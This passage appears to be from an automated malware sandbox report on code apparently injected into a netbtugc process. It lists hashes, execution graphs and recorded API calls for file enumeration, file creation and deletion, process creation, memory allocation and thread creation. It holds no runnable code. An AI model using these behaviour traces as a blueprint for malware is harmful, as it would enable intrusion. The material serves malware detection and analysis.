                                                            • Opcode ID: 55e73c7699b688e1c555acc0b371f8ef96651c5e250ac94d8de5142c426fecf7
                                                            • Instruction ID: 4f87132283f6c70637e8715b26bccd0c3d6442cee9a6152f56780075ab81bd3a
                                                            • Opcode Fuzzy Hash: 55e73c7699b688e1c555acc0b371f8ef96651c5e250ac94d8de5142c426fecf7
                                                            • Instruction Fuzzy Hash: 5F0161B2900218ABDB14DF98DC84ADEF7B9FF48314F048259E9195B205E772A544CBA0

                                                            Execution Graph

                                                            Execution Coverage:3.3%
                                                            Dynamic/Decrypted Code Coverage:4.2%
                                                            Signature Coverage:2.2%
                                                            Total number of Nodes:452
                                                            Total number of Limit Nodes:74
                                                            execution_graph 76798 2570a50 76799 2570a6c 76798->76799 76800 2570a94 76799->76800 76801 2570aa8 76799->76801 76802 2577be0 NtClose 76800->76802 76808 2577be0 76801->76808 76804 2570a9d 76802->76804 76805 2570ab1 76811 2579b90 RtlAllocateHeap 76805->76811 76807 2570abc 76809 2577bfd 76808->76809 76810 2577c0e NtClose 76809->76810 76810->76805 76811->76807 76817 2574410 76818 257446a 76817->76818 76820 2574477 76818->76820 76821 2566c80 76818->76821 76823 2566c37 76821->76823 76822 2566c72 76822->76820 76823->76822 76825 256a810 76823->76825 76826 256a836 76825->76826 76827 256aa55 76826->76827 76852 2577fc0 76826->76852 76827->76822 76829 256a8ac 76829->76827 76855 257ac80 76829->76855 76831 256a8c8 76831->76827 76832 256a999 76831->76832 76861 2577290 76831->76861 76834 25652c0 LdrInitializeThunk 76832->76834 76836 256a9b8 76832->76836 76834->76836 76841 256aa3d 76836->76841 76873 2576e60 76836->76873 76837 256a981 76869 2567780 76837->76869 76839 256a95f 76888 2573460 LdrInitializeThunk 76839->76888 76840 256a92d 76840->76827 76840->76837 76840->76839 76865 25652c0 76840->76865 76843 2567780 LdrInitializeThunk 76841->76843 76847 256aa4b 76843->76847 76847->76822 76848 256aa14 76878 2576f00 76848->76878 76850 256aa2e 76883 2577040 76850->76883 76853 2577fdd 76852->76853 76854 2577fee CreateProcessInternalW 76853->76854 76854->76829 76856 257abf0 76855->76856 76857 257ac4d 76856->76857 76889 2579b50 76856->76889 76857->76831 76859 257ac2a 76892 2579a70 76859->76892 76862 25772ad 76861->76862 76901 2f22c0a 76862->76901 76863 256a924 76863->76832 76863->76840 76866 25652cb 76865->76866 76904 2577450 76866->76904 76868 25652fe 76868->76839 76870 2567793 76869->76870 76910 25771a0 76870->76910 76872 25677be 76872->76822 76874 2576ecc 76873->76874 76876 2576e84 76873->76876 76916 2f239b0 LdrInitializeThunk 76874->76916 76875 2576ef1 76875->76848 76876->76848 76879 2576f69 76878->76879 76881 2576f21 76878->76881 76917 2f24340 LdrInitializeThunk 76879->76917 76880 2576f8e 76880->76850 76881->76850 76884 25770ac 76883->76884 76885 2577064 76883->76885 76918 2f22fb0 LdrInitializeThunk 76884->76918 76885->76841 76886 25770d1 76886->76841 76888->76837 76895 2577ee0 76889->76895 76891 2579b68 76891->76859 76898 2577f30 76892->76898 76894 2579a86 76894->76857 76896 2577efd 76895->76896 76897 2577f0e RtlAllocateHeap 76896->76897 76897->76891 76899 2577f4d 76898->76899 76900 2577f5e RtlFreeHeap 76899->76900 76900->76894 76902 2f22c11 76901->76902 76903 2f22c1f LdrInitializeThunk 76901->76903 76902->76863 76903->76863 76905 2577474 76904->76905 76906 25774ec 76904->76906 76905->76868 76909 2f22d10 LdrInitializeThunk 76906->76909 76907 2577531 76907->76868 76909->76907 76911 257720a 76910->76911 76913 25771c1 76910->76913 76915 2f22dd0 LdrInitializeThunk 76911->76915 76912 257722f 76912->76872 76913->76872 76915->76912 76916->76875 76917->76880 76918->76886 76919 2574c10 76920 2574c6a 76919->76920 76922 2574c77 76920->76922 76923 25727b0 76920->76923 76930 25799e0 76923->76930 76925 25728f6 76925->76922 76926 25727f1 76926->76925 76933 25640a0 76926->76933 76928 2572870 Sleep 76929 2572837 76928->76929 76929->76925 76929->76928 76937 2577d30 76930->76937 76932 2579a11 76932->76926 76934 25640c4 76933->76934 76935 25640cb 76934->76935 76936 2564110 LdrLoadDll 76934->76936 76935->76929 76936->76935 76938 2577db1 76937->76938 76940 2577d51 76937->76940 76939 2577dc7 NtAllocateVirtualMemory 76938->76939 76939->76932 76940->76932 76941 2577b50 76942 2577bb6 76941->76942 76944 2577b74 76941->76944 76943 2577bcc NtDeleteFile 76942->76943 76945 25666da 76946 256669f 76945->76946 76949 25666de 76945->76949 76950 25675b0 76946->76950 76948 25666b4 76951 25675cd 76950->76951 76957 2577380 76951->76957 76953 256761d 76954 2567624 76953->76954 76955 2577450 LdrInitializeThunk 76953->76955 76954->76948 76956 256764d 76955->76956 76956->76948 76958 2577407 76957->76958 76960 25773a1 76957->76960 76962 2f22f30 LdrInitializeThunk 76958->76962 76959 2577440 76959->76953 76960->76953 76962->76959 76963 256231b 76966 2562320 76963->76966 76968 256237b 76963->76968 76965 25623a0 76967 25640a0 LdrLoadDll 76966->76967 76967->76968 76968->76965 76969 2565bb0 76968->76969 76970 2565be3 76969->76970 76971 2565c07 76970->76971 76976 2577790 76970->76976 76971->76965 76973 2565c2a 76973->76971 76974 2577be0 NtClose 76973->76974 76975 2565cac 76974->76975 76975->76965 76977 25777aa 76976->76977 76980 2f22ca0 LdrInitializeThunk 76977->76980 76978 25777d6 76978->76973 76980->76978 76982 25653c4 76983 25653ce 76982->76983 76984 256535b 76982->76984 76985 2565406 76983->76985 76986 2577290 LdrInitializeThunk 76983->76986 76989 2565370 76984->76989 76990 2567780 LdrInitializeThunk 76984->76990 77000 2577c70 76985->77000 76986->76985 76988 256541b 76992 256539c 76989->76992 76993 2567700 76989->76993 76990->76989 76994 2567744 76993->76994 76995 2567765 76994->76995 77005 2576fa0 76994->77005 76995->76989 76997 2567755 76998 2567771 76997->76998 76999 2577be0 NtClose 76997->76999 76998->76989 76999->76995 77001 2577ceb 77000->77001 77002 2577c91 77000->77002 77011 2f22e80 LdrInitializeThunk 77001->77011 77002->76988 77003 2577d1c 77003->76988 77006 257700c 77005->77006 77008 2576fc4 77005->77008 77010 2f24650 LdrInitializeThunk 77006->77010 77007 2577031 77007->76997 77008->76997 77010->77007 77011->77003 77013 2559480 77016 255995a 77013->77016 77014 2559e57 77016->77014 77017 2579700 77016->77017 77018 2579726 77017->77018 77023 2553e80 77018->77023 77020 2579732 77022 2579760 77020->77022 77026 2574250 77020->77026 77022->77014 77030 2562de0 77023->77030 77025 2553e8d 77025->77020 77027 25742aa 77026->77027 77028 25742b7 77027->77028 77041 25612c0 77027->77041 77028->77022 77031 2562df7 77030->77031 77033 2562e0d 77031->77033 77034 2578610 77031->77034 77033->77025 77036 2578628 77034->77036 77035 257864c 77035->77033 77036->77035 77037 2577290 LdrInitializeThunk 77036->77037 77038 257869b 77037->77038 77039 2579a70 RtlFreeHeap 77038->77039 77040 25786b4 77039->77040 77040->77033 77042 25612fb 77041->77042 77057 2567510 77042->77057 77044 2561303 77045 25615c5 77044->77045 77046 2579b50 RtlAllocateHeap 77044->77046 77045->77028 77047 2561319 77046->77047 77048 2579b50 RtlAllocateHeap 77047->77048 77049 256132a 77048->77049 77050 2579b50 RtlAllocateHeap 77049->77050 77052 256133b 77050->77052 77056 25613ce 77052->77056 77072 2566310 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 77052->77072 77053 25640a0 LdrLoadDll 77054 2561582 77053->77054 77068 2576970 77054->77068 77056->77053 77058 256753c 77057->77058 77073 2567400 77058->77073 77061 2567581 77063 256759d 77061->77063 77066 2577be0 NtClose 77061->77066 77062 2567569 77064 2567574 77062->77064 77065 2577be0 NtClose 77062->77065 77063->77044 77064->77044 77065->77064 77067 2567593 77066->77067 77067->77044 77069 25769ca 77068->77069 77071 25769d7 77069->77071 77084 25615e0 77069->77084 77071->77045 77072->77056 77074 25674f6 77073->77074 77075 256741a 77073->77075 77074->77061 77074->77062 77079 2577330 77075->77079 77078 2577be0 NtClose 77078->77074 77080 257734d 77079->77080 77083 2f235c0 LdrInitializeThunk 77080->77083 77081 25674ea 77081->77078 77083->77081 77087 2561600 77084->77087 77100 25677e0 77084->77100 77086 2561ae5 77086->77071 77087->77086 77104 2570420 77087->77104 77090 25617fe 77091 257ac80 2 API calls 77090->77091 77094 2561813 77091->77094 77092 256165b 77092->77086 77107 257ab50 77092->77107 77093 2567780 LdrInitializeThunk 77095 256183e 77093->77095 77094->77095 77112 2560280 77094->77112 77095->77086 77095->77093 77098 2560280 LdrInitializeThunk 77095->77098 77097 2567780 LdrInitializeThunk 77099 256196c 77097->77099 77098->77095 77099->77095 77099->77097 77101 25677ed 77100->77101 77102 2567815 77101->77102 77103 256780e SetErrorMode 77101->77103 77102->77087 77103->77102 77105 25799e0 NtAllocateVirtualMemory 77104->77105 77106 2570441 77105->77106 77106->77092 77108 257ab66 77107->77108 77109 257ab60 77107->77109 77110 2579b50 RtlAllocateHeap 77108->77110 77109->77090 77111 257ab8c 77110->77111 77111->77090 77113 25602a2 77112->77113 77115 2577e40 77112->77115 77113->77099 77116 2577e5a 77115->77116 77119 2f22c70 LdrInitializeThunk 77116->77119 77117 2577e82 77117->77113 77119->77117 77120 2560700 77121 2560719 77120->77121 77122 25640a0 LdrLoadDll 77121->77122 77123 2560737 77122->77123 77124 2560783 77123->77124 77125 2560770 PostThreadMessageW 77123->77125 77125->77124 77126 256eb80 77127 256ebe4 77126->77127 77128 2565bb0 2 API calls 77127->77128 77130 256ed0d 77128->77130 77129 256ed14 77130->77129 77157 2565cc0 77130->77157 77133 256eeb3 77135 256edad 77136 256eec2 77135->77136 77166 256e960 77135->77166 77138 2577be0 NtClose 77136->77138 77140 256eecc 77138->77140 77139 256edc5 77139->77136 77141 256edd0 77139->77141 77142 2579b50 RtlAllocateHeap 77141->77142 77143 256edf9 77142->77143 77144 256ee02 77143->77144 77145 256ee18 77143->77145 77146 2577be0 NtClose 77144->77146 77175 256e850 CoInitialize 77145->77175 77148 256ee0c 77146->77148 77149 256ee26 77177 25776f0 77149->77177 77151 256eea2 77152 2577be0 NtClose 77151->77152 77153 256eeac 77152->77153 77154 2579a70 RtlFreeHeap 77153->77154 77154->77133 77155 256ee44 77155->77151 77156 25776f0 LdrInitializeThunk 77155->77156 77156->77155 77158 2565ce5 77157->77158 77181 2577580 77158->77181 77161 25759a0 77162 25759fd 77161->77162 77163 2575a30 77162->77163 77186 256f751 RtlFreeHeap 77162->77186 77163->77135 77165 2575a12 77165->77135 77167 256e97c 77166->77167 77168 25640a0 LdrLoadDll 77167->77168 77170 256e99a 77168->77170 77169 256e9a3 77169->77139 77170->77169 77171 25640a0 LdrLoadDll 77170->77171 77172 256ea6e 77171->77172 77173 25640a0 LdrLoadDll 77172->77173 77174 256eacb 77172->77174 77173->77174 77174->77139 77176 256e8b5 77175->77176 77176->77149 77178 257770a 77177->77178 77187 2f22ba0 LdrInitializeThunk 77178->77187 77179 257773a 77179->77155 77182 257759d 77181->77182 77185 2f22c60 LdrInitializeThunk 77182->77185 77183 2565d59 77183->77133 77183->77161 77185->77183 77186->77165 77187->77179 77188 2577240 77189 257725d 77188->77189 77192 2f22df0 LdrInitializeThunk 77189->77192 77190 2577285 77192->77190 77203 2f22ad0 LdrInitializeThunk 77204 2566a30 77205 2566a4c 77204->77205 77208 2566a9f 77204->77208 77207 2577be0 NtClose 77205->77207 77205->77208 77206 2566bc8 77209 2566a67 77207->77209 77208->77206 77215 2565e40 NtClose LdrInitializeThunk LdrInitializeThunk 77208->77215 77214 2565e40 NtClose LdrInitializeThunk LdrInitializeThunk 77209->77214 77211 2566ba2 77211->77206 77216 2566010 NtClose LdrInitializeThunk LdrInitializeThunk 77211->77216 77214->77208 77215->77211 77216->77206 77217 256bab0 77219 256bad9 77217->77219 77218 256bbdd 77219->77218 77220 256bb83 FindFirstFileW 77219->77220 77220->77218 77221 256bb9e 77220->77221 77222 256bbc4 FindNextFileW 77221->77222 77222->77221 77223 256bbd6 FindClose 77222->77223 77223->77218 77224 2577a70 77225 2577b06 77224->77225 77227 2577a94 77224->77227 77226 2577b1c NtReadFile 77225->77226 77228 2575870 77229 25758cd 77228->77229 77230 25758f8 77229->77230 77233 256fd80 77229->77233 77232 25758da 77237 256fb40 77233->77237 77234 256fd70 77234->77232 77235 2565cc0 LdrInitializeThunk 77235->77237 77236 25776f0 LdrInitializeThunk 77236->77237 77237->77234 77237->77235 77237->77236 77238 2577be0 NtClose 77237->77238 77238->77237 77239 2567e31 77240 2567e22 77239->77240 77241 2567e36 77239->77241 77241->77240 77243 2566880 LdrInitializeThunk LdrInitializeThunk 77241->77243 77243->77240 77244 257abb0 77245 2579a70 RtlFreeHeap 77244->77245 77246 257abc5 77245->77246 77247 256923b 77248 256924a 77247->77248 77249 2569251 77248->77249 77250 2579a70 RtlFreeHeap 77248->77250 77250->77249 77251 2559420 77252 255942f 77251->77252 77253 2559470 77252->77253 77254 255945d CreateThread 77252->77254 77255 255b0e0 77256 25799e0 NtAllocateVirtualMemory 77255->77256 77257 255c751 77255->77257 77256->77257 77258 256f460 77259 256f47d 77258->77259 77260 25640a0 LdrLoadDll 77259->77260 77261 256f49b 77260->77261 77262 25759a0 RtlFreeHeap 77261->77262 77263 256f61a 77261->77263 77262->77263 77264 256a320 77269 256a050 77264->77269 77266 256a32d 77283 2569cf0 77266->77283 77268 256a343 77270 256a075 77269->77270 77294 25679d0 77270->77294 77273 256a1b2 77273->77266 77275 256a1c9 77275->77266 77276 256a1c0 77276->77275 77280 256a2b1 77276->77280 77309 2569750 77276->77309 77279 256a309 77281 2579a70 RtlFreeHeap 77279->77281 77280->77279 77318 2569ab0 77280->77318 77282 256a310 77281->77282 77282->77266 77284 2569d06 77283->77284 77287 2569d11 77283->77287 77285 2579b50 RtlAllocateHeap 77284->77285 77285->77287 77286 2569d27 77286->77268 77287->77286 77288 25679d0 GetFileAttributesW 77287->77288 77289 256a01e 77287->77289 77292 2569750 RtlFreeHeap 77287->77292 77293 2569ab0 RtlFreeHeap 77287->77293 77288->77287 77290 256a037 77289->77290 77291 2579a70 RtlFreeHeap 77289->77291 77290->77268 77291->77290 77292->77287 77293->77287 77295 25679f1 77294->77295 77296 2567a03 77295->77296 77297 25679f8 GetFileAttributesW 77295->77297 77296->77273 77298 25720a0 77296->77298 77297->77296 77299 25720ae 77298->77299 77300 25720b5 77298->77300 77299->77276 77301 25640a0 LdrLoadDll 77300->77301 77302 25720ea 77301->77302 77303 25720f9 77302->77303 77322 2571b70 LdrLoadDll 77302->77322 77305 2579b50 RtlAllocateHeap 77303->77305 77308 2572294 77303->77308 77307 2572112 77305->77307 77306 2579a70 RtlFreeHeap 77306->77308 77307->77306 77307->77308 77308->77276 77310 2569776 77309->77310 77323 256cf70 77310->77323 77312 25697dd 77314 256995f 77312->77314 77315 25697fb 77312->77315 77313 2569944 77313->77276 77314->77313 77316 2569610 RtlFreeHeap 77314->77316 77315->77313 77328 2569610 77315->77328 77316->77314 77319 2569ad6 77318->77319 77320 256cf70 RtlFreeHeap 77319->77320 77321 2569b52 77320->77321 77321->77280 77322->77303 77324 256cf80 77323->77324 77325 256cf90 77324->77325 77326 2579a70 RtlFreeHeap 77324->77326 77325->77312 77327 256cfc9 77326->77327 77327->77312 77329 2569626 77328->77329 77332 256cfe0 77329->77332 77331 256972c 77331->77315 77333 256d004 77332->77333 77334 256d09c 77333->77334 77335 2579a70 RtlFreeHeap 77333->77335 77334->77331 77335->77334 77336 25770e0 77337 257715b 77336->77337 77338 2577101 77336->77338 77341 2f22ee0 LdrInitializeThunk 77337->77341 77339 257718c 77341->77339 77342 2577920 77343 25779bf 77342->77343 77345 2577941 77342->77345 77344 25779d5 NtCreateFile 77343->77344 77346 2570de0 77350 2570def 77346->77350 77347 2570e33 77348 2579a70 RtlFreeHeap 77347->77348 77349 2570e43 77348->77349 77350->77347 77351 2570e71 77350->77351 77353 2570e76 77350->77353 77352 2579a70 RtlFreeHeap 77351->77352 77352->77353 77354 2562cec 77355 2567400 2 API calls 77354->77355 77356 2562cfc 77355->77356 77357 2577be0 NtClose 77356->77357 77358 2562d11 77356->77358 77357->77358

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 26 2559480-2559958 27 2559969-2559975 26->27 28 255995a-2559963 26->28 29 2559977-2559989 27->29 30 255998b-2559995 27->30 28->27 29->28 31 25599a6-25599b2 30->31 32 25599b4-25599c0 31->32 33 25599c2-25599cc 31->33 32->31 35 25599dd-25599e9 33->35 36 25599ff-2559a10 35->36 37 25599eb-25599fd 35->37 39 2559a21-2559a2d 36->39 37->35 40 2559a3d-2559a47 39->40 41 2559a2f-2559a3b 39->41 43 2559a58-2559a61 40->43 41->39 44 2559a77-2559a88 43->44 45 2559a63-2559a75 43->45 47 2559a99-2559aa5 44->47 45->43 48 2559aa7-2559ab0 47->48 49 2559acc-2559ad3 47->49 50 2559ab7-2559ab9 48->50 51 2559ab2-2559ab6 48->51 52 2559ad5-2559b08 49->52 53 2559b0a 49->53 54 2559abb-2559ac4 50->54 55 2559aca 50->55 51->50 52->49 56 2559b11-2559b1a 53->56 54->55 55->47 58 2559b20-2559b33 56->58 59 2559de3-2559ded 56->59 60 2559b44-2559b50 58->60 61 2559e21-2559e28 59->61 62 2559def-2559e0e 59->62 65 2559b52-2559b5b 60->65 66 2559b68-2559b6c 60->66 63 2559e72-2559e7c 61->63 64 2559e2a-2559e31 61->64 67 2559e10-2559e19 62->67 68 2559e1f 62->68 71 2559e33-2559e50 64->71 72 2559e52 call 2579700 64->72 69 2559b66 65->69 70 2559b5d-2559b63 65->70 73 2559b87-2559b91 66->73 74 2559b6e-2559b85 66->74 67->68 68->59 69->60 70->69 71->64 79 2559e57-2559e70 72->79 77 2559b93-2559bad 73->77 78 2559bc8-2559bd7 73->78 74->66 80 2559bb4-2559bb6 77->80 81 2559baf-2559bb3 77->81 82 2559bde-2559be8 78->82 83 2559bd9 78->83 79->63 79->79 84 2559bc6 80->84 85 2559bb8-2559bc0 80->85 81->80 86 2559bf9-2559c02 82->86 83->59 84->73 85->84 87 2559c04-2559c16 86->87 88 2559c18-2559c22 86->88 87->86 90 2559c33-2559c3f 88->90 91 2559c41-2559c4d 90->91 92 2559c5d-2559c67 90->92 93 2559c4f-2559c55 91->93 94 2559c5b 91->94 95 2559c78-2559c81 92->95 93->94 94->90 97 2559c97-2559ca4 95->97 98 2559c83-2559c95 95->98 100 2559caa-2559cae 97->100 98->95 101 2559cb0-2559cc7 100->101 102 2559cc9-2559cd9 100->102 101->100 102->102 103 2559cdb-2559ce5 102->103 104 2559cf6-2559d02 103->104 105 2559d04-2559d16 104->105 106 2559d18-2559d24 104->106 105->104 108 2559d26-2559d47 106->108 109 2559d49-2559d53 106->109 108->106 110 2559d64-2559d70 109->110 111 2559d83-2559d8d 110->111 112 2559d72-2559d81 110->112 114 2559d9e-2559daa 111->114 112->110 115 2559dc1-2559dde 114->115 116 2559dac-2559dbf 114->116 115->56 116->114
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: w$"1$%7$&l$,Z$/>$/F$0$8$9l$@h$A"$E$E&$L$NH$O{$Xo$Z$]$]S$_E$`q$f$g$gJ$gu$h$hY$hk$k$n$rx$v$)$,$g$k
                                                            • API String ID: 0-4001259705
                                                            • Opcode ID: 0926dabe00cf159299db431d779f028c51aa9b45d58bea836d30eace3ef55db3
                                                            • Instruction ID: ec0b029e3b870a2335bec29ff01e539c2698356ea7b51fe769b54c4fc6d768c5
                                                            • Opcode Fuzzy Hash: 0926dabe00cf159299db431d779f028c51aa9b45d58bea836d30eace3ef55db3
                                                            • Instruction Fuzzy Hash: 4642AFB0D05669CBEB24CF44C9A87DDBBB2BB45308F1085DAD50D6B281C7B95AC9CF84
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0256BB94
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0256BBCF
                                                            • FindClose.KERNELBASE(?), ref: 0256BBDA
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 40fafa1aea30956ee374340ec8faf41636785d35b10ef79456dc0c171b2ef5a2
                                                            • Instruction ID: 0366c58bbfcce4bf39cd7b482a27b493615de519cf5c0dccb380361c15faf6a7
                                                            • Opcode Fuzzy Hash: 40fafa1aea30956ee374340ec8faf41636785d35b10ef79456dc0c171b2ef5a2
                                                            • Instruction Fuzzy Hash: 6731857194020A7BEB20DBA0DC85FFF777DAF84748F144558B908A7190D774AA84CFA4
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,000000E9,?,?,?,?,?,?,?,?,?), ref: 02577A06
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: db2d222b4f28535e81006a854b07ad261685b7b3df404698942d3def3fcd3837
                                                            • Instruction ID: 88c34fa1fb7c6baa8c63207198e96a051d3ff90d78dc60cd0d4b2c50adfcc6cf
                                                            • Opcode Fuzzy Hash: db2d222b4f28535e81006a854b07ad261685b7b3df404698942d3def3fcd3837
                                                            • Instruction Fuzzy Hash: 3231C3B5A01649AFDB14DF99D980EDEBBB9AF8C304F108219FD09A7240D770A8518FA5
                                                            APIs
                                                            • NtReadFile.NTDLL(?,000000E9,?,?,?,?,?,?,?), ref: 02577B45
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 391251eefbc9ad381e8ba4752c904bf3950061ea70f9791e4aec23deb7fcac29
                                                            • Instruction ID: cf9ea83c8e217fa4e58d0e68c603f646828f590cc8c912c8d94e806bdbf7e873
                                                            • Opcode Fuzzy Hash: 391251eefbc9ad381e8ba4752c904bf3950061ea70f9791e4aec23deb7fcac29
                                                            • Instruction Fuzzy Hash: CD31D975A00649AFDB14DF99D880EEFB7B9EF8C314F108219FD18A7240D774A8518FA5
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(0256165B,?,025769D7,00000000,00000004,00003000,?,?,?,?,?,025769D7,0256165B,?,02579A11,025769D7), ref: 02577DE4
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 75429a692b40c999ccd02512e5283f3b84b35ac49fffaa42beb723ca8b2bdc5b
                                                            • Instruction ID: 71c73c85ef44cad0a75a6ee23e6ba59f8880c8b791aa5200bf585ec063b66ded
                                                            • Opcode Fuzzy Hash: 75429a692b40c999ccd02512e5283f3b84b35ac49fffaa42beb723ca8b2bdc5b
                                                            • Instruction Fuzzy Hash: F42139B1640649AFDB10DF98DC40EAFB7B9EF88310F10860AFD18A7280D774A8118BA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 20fa849fa18cb33331584df8e35a80326abb305d562f3fb28c37b66c0dbc9b53
                                                            • Instruction ID: 055ad60166a3ffa0838faa4f78d8a45d68f9426f903651928604eb32a1a5ac43
                                                            • Opcode Fuzzy Hash: 20fa849fa18cb33331584df8e35a80326abb305d562f3fb28c37b66c0dbc9b53
                                                            • Instruction Fuzzy Hash: 9F01C431641A05BFE620EAA4DC45FAB77ADEBC5710F008509FE085B280D7B1B9048BE5
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02577C17
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                                            • Instruction ID: 73b9c351baab9876cfd249c727d28f2f9cc8f33318cd4cfce82b7ba205227fe3
                                                            • Opcode Fuzzy Hash: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                                            • Instruction Fuzzy Hash: 77E04F322016157BD610EA59DC41FAB776DDFC5750F008016FA08A7241C671791087A5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 2c2c16f532ba52824e6e787ef2df82d1f37020dda4f5e69e528ba2af641b522d
                                                            • Instruction ID: 2df5e49272a405c783361123c89a1c1cc84fb3db390afff1f5346d6952f9d449
                                                            • Opcode Fuzzy Hash: 2c2c16f532ba52824e6e787ef2df82d1f37020dda4f5e69e528ba2af641b522d
                                                            • Instruction Fuzzy Hash: BD90023160580022954171588884547501597E0381B55C011F1428554C8A188A566361
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 929358e56300324eb76983ae055d58d490a0eb82505df35258699add49ef444d
                                                            • Instruction ID: 27883b016f92ce3ce5df6ad27a360ca1b6adde495c15ce2d30f8c15e475ec6f3
                                                            • Opcode Fuzzy Hash: 929358e56300324eb76983ae055d58d490a0eb82505df35258699add49ef444d
                                                            • Instruction Fuzzy Hash: 2C90026160150052454171588804407701597E1381395C115F1558560C861C8955A269
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9e30420beb9f18c54897c770759fba3fdfb4c0c626f928a9f8973542af84d3ba
                                                            • Instruction ID: e53da5599f4230300eccf9776f5ce2900c85a369f93628fa2ab75946e6a720bf
                                                            • Opcode Fuzzy Hash: 9e30420beb9f18c54897c770759fba3fdfb4c0c626f928a9f8973542af84d3ba
                                                            • Instruction Fuzzy Hash: 0890023160550412D50171588514707201587D0281F65C411F1428568D87998A5175A2
                                                            APIs
                                                            Memory Dump Source
